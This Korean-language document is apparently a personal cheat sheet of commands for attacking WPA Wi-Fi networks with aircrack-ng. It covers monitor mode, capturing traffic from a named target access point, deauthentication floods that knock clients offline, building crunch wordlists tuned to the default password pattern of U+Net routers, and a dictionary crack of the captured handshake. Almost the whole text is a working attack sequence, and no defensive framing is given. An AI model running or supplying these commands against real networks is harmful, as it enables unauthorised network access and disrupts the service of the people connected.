설치 - aircrack-ng
sudo apt install aircrack-ng net-tools -y
모니터 모드로 전환
sudo ifconfig wlx909f33ee3999 down
sudo **iwconfig** wlx909f33ee3999 mode monitor
sudo ifconfig wlx909f33ee3999 up
네트워크 스캔
sudo airodump-ng wlx909f33ee3999
특정 AP에 대해서만 네트워크 스캔(채널과 MAC 주소로. -c를 입력하지 않으면 모든 채널)
sudo airodump-ng -c 8 --bssid 88:36:6c:86:5f:04 wlx909f33ee3999
특정 AP에 대해서만 네트워크 스캔(채널과 ssid로. -c를 입력하지 않으면 모든 채널)
sudo airodump-ng -c 8 --bssid U+NetB963 wlx909f33ee3999
특정 AP에 대해서만 네트워크 스캔하고 hack1 파일로 저장(채널과 ssid로. -c를 입력하지 않으면 모든 채널)
sudo airodump-ng -w hack1 -c 8 --bssid U+NetB963 wlx909f33ee3999
deauth로 연결 해제 패킷을 보내기 전 유의사항: 채널을 해당 AP 채널로 맞춰 주어야 함
sudo airodump-ng wlx909f33ee3999 -c 13
88:36:6C:6E:E8:E8 MAC 주소를 가진 AP에 대해 연결 해제 패킷을 100개 보냄
sudo aireplay-ng --deauth 100 -a 88:36:6C:6E:E8:E8 wlx909f33ee3999
U+NetB963 AP에 대해 연결 해제 패킷을 100개 보냄
sudo aireplay-ng --deauth 100 -e U+NetB963 wlx909f33ee3999
monitor mode로 변환 안될 때 NIC를 사용 중인 프로세스 kill하기
sudo airmon-ng check kill
crunch로 암호 사전 만들기
sudo apt install crunch -y
# 3자~5자의 사전 파일을 list.txt라는 이름으로 만들되,
# 0123456789를 사용해서 만들어라.
# -o 뒤에는 경로를 적음. 파일 이름만 입력하면 현재 위치에 저장
sudo crunch 3 5 0123456789 -o /root/list.txt
# 8글자 패스워드를 만들되, 0123456789를 사용하고, sp로 시작하도록 만들어라.
# 바탕화면에 dic01.txt로 저장하라.
crunch 8 8 0123456789 -t sp@@@@@@ -o /home/usys/바탕화면/dic01.txt
# U+Net 기본 암호 전용 사전 파일 만들기
crunch 10 10 0123456789 -t @00000@@@@ -o ./바탕화면/dic_U+Net.txt
모니터 모드로 전환
sudo ifconfig wlx909f33ee3999 down
sudo **iwconfig** wlx909f33ee3999 mode monitor
sudo ifconfig wlx909f33ee3999 up
타깃 ssid의 채널을 알아내기 위한 전체 네트워크 스캔
sudo airodump-ng wlx909f33ee3999
타깃 ssid에 대해서만 네트워크 스캔, hack01.cap 파일로 저장
sudo airodump-ng -w hack01 -c 8 --bssid U+NetB963 wlx909f33ee3999
타킷 AP에 대해 연결 해제 패킷 송신
sudo aireplay-ng --deauth 100 -e U+NetB963 wlx909f33ee3999
BIG-WPA-LIST-2 dictionary 파일로 패스워드 크랙(dictionary) (bruteforce 옵션 없음)
sudo aircrack-ng hack01.cap -w ./바탕화면/BIG-WPA-LIST-2